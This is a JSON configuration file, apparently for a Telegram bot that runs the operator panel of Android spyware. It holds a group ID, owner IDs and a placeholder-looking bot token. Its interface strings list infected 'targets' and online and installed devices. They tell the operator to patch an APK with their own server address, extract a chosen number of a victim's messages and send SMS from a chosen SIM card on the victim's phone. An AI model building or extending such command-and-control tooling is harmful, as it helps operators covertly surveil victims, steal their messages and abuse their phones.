{
  "settings": {
    "Group": "349284392834",
    "Owners": "349823948234,3948234,384723847234",
    "TOKEN": "3948239482934:lkjwekfjwkefjwekfjowefjaaaaaiowefjj"
  },

  "LOCALIZATION": {
    "phone_notfound": "The target was not found in the database ❌",
    "enter_fullname": "Please enter the new target name 🪐",
    "sent_request": "Your request has been successfully sent ✔️",
    "caption_app": "Please configure and install the file using APK editor 🛢\n- Search for <code>localhost:5000</code> and replace with IP:port",
    "main_text": "🔗 Welcome to the admin panel bot \n- Please continue from the keyboard below",
    "enter_link": "Please enter the new https link 🪐",
    "device_text": "The target's name is - <code>fullname</code>\nThe target's last activity is - <code>activity</code>\n\nPlease continue from the keyboard below ⌨️",
    "target_deleted": "The target has been deleted from the database ✔️",
    "enter_message": "Please submit the message text 🪐",
    "enter_phone": "Enter phone numbers 🎈",
    "target_list": "- Number of online devices: count_online\n- Number of installed devices: count_installed\n\nThe available targets are listed below: 🎮list_targets\n\nPlease send me the name of your desired target 🧵",
    "file_notfound": "The file is not available to send ❌",
    "invalid_number": "Please enter a valid number ⛔️",
    "changed_fullname": "Fullname changed successfully ✔️",
    "device_notfound": "Device not found ❌",
    "filter_text": "Select a category to filter  🎈",
    "select_sim_card": "Which SIM card should the message be sent from 🎈",
    "configuration_text": "⚙️ Change your configuration settings ⚙️",
    "select_icon": "Your choice is important 🪐",
    "count_message": "How many messages do you want to extract 🎲",
    "get_phone_numbers": "Enter phone numbers and separate with <code>comma</code> 🎈"
  },
  "AllowedHosts": "*"
}